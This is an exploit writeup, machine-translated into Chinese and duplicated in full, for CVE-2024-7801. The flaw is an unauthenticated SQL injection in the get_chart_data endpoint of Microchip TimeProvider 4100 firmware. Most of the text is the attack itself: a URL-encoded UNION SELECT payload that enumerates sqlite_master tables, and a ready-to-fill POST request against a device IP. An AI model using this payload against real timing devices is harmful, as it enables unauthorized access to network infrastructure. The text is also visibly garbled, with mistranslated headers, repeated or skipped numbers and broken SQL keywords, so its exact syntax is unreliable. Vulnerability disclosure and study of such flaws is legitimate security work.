#利用标题: Microchip TimeProvider 4100 Grandmaster-未经身心的SQL注入
#利用作者: Armando Huesca Prida,Marco negro
#发现了By: Armando Huesca Prida,Marco Negro,Antonio Carriero,Vito Pistillo,Davide Renna,Manuel Leone,Massimiliano Brolli
#披露日期: 27/06/2024
#CVE出版物的日期: 4/10/2024
#开发出版物: 11/10/2024
#供应商HomePage3360 https://www.microchip.com/
#版本:固件版本1.0至2.4.7
#测试ON:固件版本2.3.12
#CVE: CVE-2024-7801
#外部参考文献:
#url: https://www.cve.org/cvecord?id=cve-2024-7801
#url: https://www.0xhuesca.com/2024/10/cve-2024-7801.html
#url: https://www.microchip.com/en-us/sol...urity-vulneribilities/timeprovider-4100--4100 grandmaster-unatthenticatienticatienticatecticated-sql-sql-indouss
#url: https://www.gruppotim.it/it/footer/red-team.html
#漏洞描述:
TimeProvider®4100GrandMaster固件在“ GET_CHART_DATA” WEB资源中具有SQL注入漏洞,特别是将“ ChannelID”参数直接插入了表的SQL查询(SQLITE),从而在表的名称查询参数中插入了来自操作中的SQL查询(SQLITE)。未经验证的威胁行为者可以操纵查询以对该设备执行恶意SQL命令。
#恶意SQL PAYLOAD:的示例
选择%20平方%202,%203,%204,%205,%206,%207,%208,%209,%209,%2010,%2011,%2013,%2013,%2014,%2015,%2016,%2016,%2017,%2017,%2018,%2018,%2020,%2020,%2020,%,%,%,% 2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040, %2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2048,%2049,%2050,%2051,%2052,%2052,%2053,%2054,%2054,%2055,%2055,%2056,%2057,%2057,%2058,%2058,%2059,2059,5059,5060 ,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20 from%20SQLITE_MASTER $ 20WHERD20THEWHESTYPE='table'table'$ 20Limit%201%201%20 offset%20 Offset%200--200-200--200--200--200--200-- 200---
#概念证明-POC:
通过手动修改以下请求,可以针对设备执行恶意SQL命令。在:下给出了在利用HTTP请求中必须更新的值列表。
post /get_chart_data http /1.1
HOST: [设备IP]
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
内容长度: 146
Origin: https://[设备IP]
Referer: https://[设备IP]/perfmon_synchrony_stat
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
TE:拖车
Connection:保持空白
metric=mtie_axrange=1tstart=-1ChannelName=tenmhzChannelId=
1_status%20Union%20 [恶意SQL有效载荷] %20Union%20select%201,%202,%203,%204,%205,%206,%207,%208,%209,%209,%2010,%2011,%2013,%2013,%2014,%2014,%2015,%2015,%2016,%2016,%201 7,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2026,%2027,%2028,%2029,%2029,%2030,%2031,%2031,%2032,%2033,%2033,%2034,%2034,%203 5,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2044,%2045,%2046,%2047,%2047,%2048,%2049,%2049,%2050,%2050,%2051,%2052,%2052,%205,%205 3,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2064,%2065,%2066,%2066,%2067,%2068%2068%2068%20FOM%20FOM%20tenmhz1
# 结尾
#利用作者: Armando Huesca Prida,Marco negro
#发现了By: Armando Huesca Prida,Marco Negro,Antonio Carriero,Vito Pistillo,Davide Renna,Manuel Leone,Massimiliano Brolli
#披露日期: 27/06/2024
#CVE出版物的日期: 4/10/2024
#开发出版物: 11/10/2024
#供应商HomePage3360 https://www.microchip.com/
#版本:固件版本1.0至2.4.7
#测试ON:固件版本2.3.12
#CVE: CVE-2024-7801
#外部参考文献:
#url: https://www.cve.org/cvecord?id=cve-2024-7801
#url: https://www.0xhuesca.com/2024/10/cve-2024-7801.html
#url: https://www.microchip.com/en-us/sol...urity-vulneribilities/timeprovider-4100--4100 grandmaster-unatthenticatienticatienticatecticated-sql-sql-indouss
#url: https://www.gruppotim.it/it/footer/red-team.html
#漏洞描述:
TimeProvider®4100GrandMaster固件在“ GET_CHART_DATA” WEB资源中具有SQL注入漏洞,特别是将“ ChannelID”参数直接插入了表的SQL查询(SQLITE),从而在表的名称查询参数中插入了来自操作中的SQL查询(SQLITE)。未经验证的威胁行为者可以操纵查询以对该设备执行恶意SQL命令。
#恶意SQL PAYLOAD:的示例
选择%20平方%202,%203,%204,%205,%206,%207,%208,%209,%209,%2010,%2011,%2013,%2013,%2014,%2015,%2016,%2016,%2017,%2017,%2018,%2018,%2020,%2020,%2020,%,%,%,% 2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040, %2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2048,%2049,%2050,%2051,%2052,%2052,%2053,%2054,%2054,%2055,%2055,%2056,%2057,%2057,%2058,%2058,%2059,2059,5059,5060 ,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20 from%20SQLITE_MASTER $ 20WHERD20THEWHESTYPE='table'table'$ 20Limit%201%201%20 offset%20 Offset%200--200-200--200--200--200--200-- 200---
#概念证明-POC:
通过手动修改以下请求,可以针对设备执行恶意SQL命令。在:下给出了在利用HTTP请求中必须更新的值列表。
- [恶意SQL有效载荷]
- [设备IP]
post /get_chart_data http /1.1
HOST: [设备IP]
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
内容长度: 146
Origin: https://[设备IP]
Referer: https://[设备IP]/perfmon_synchrony_stat
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
TE:拖车
Connection:保持空白
metric=mtie_axrange=1tstart=-1ChannelName=tenmhzChannelId=
1_status%20Union%20 [恶意SQL有效载荷] %20Union%20select%201,%202,%203,%204,%205,%206,%207,%208,%209,%209,%2010,%2011,%2013,%2013,%2014,%2014,%2015,%2015,%2016,%2016,%201 7,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2026,%2027,%2028,%2029,%2029,%2030,%2031,%2031,%2032,%2033,%2033,%2034,%2034,%203 5,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2044,%2045,%2046,%2047,%2047,%2048,%2049,%2049,%2050,%2050,%2051,%2052,%2052,%205,%205 3,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2064,%2065,%2066,%2066,%2067,%2068%2068%2068%20FOM%20FOM%20tenmhz1
# 结尾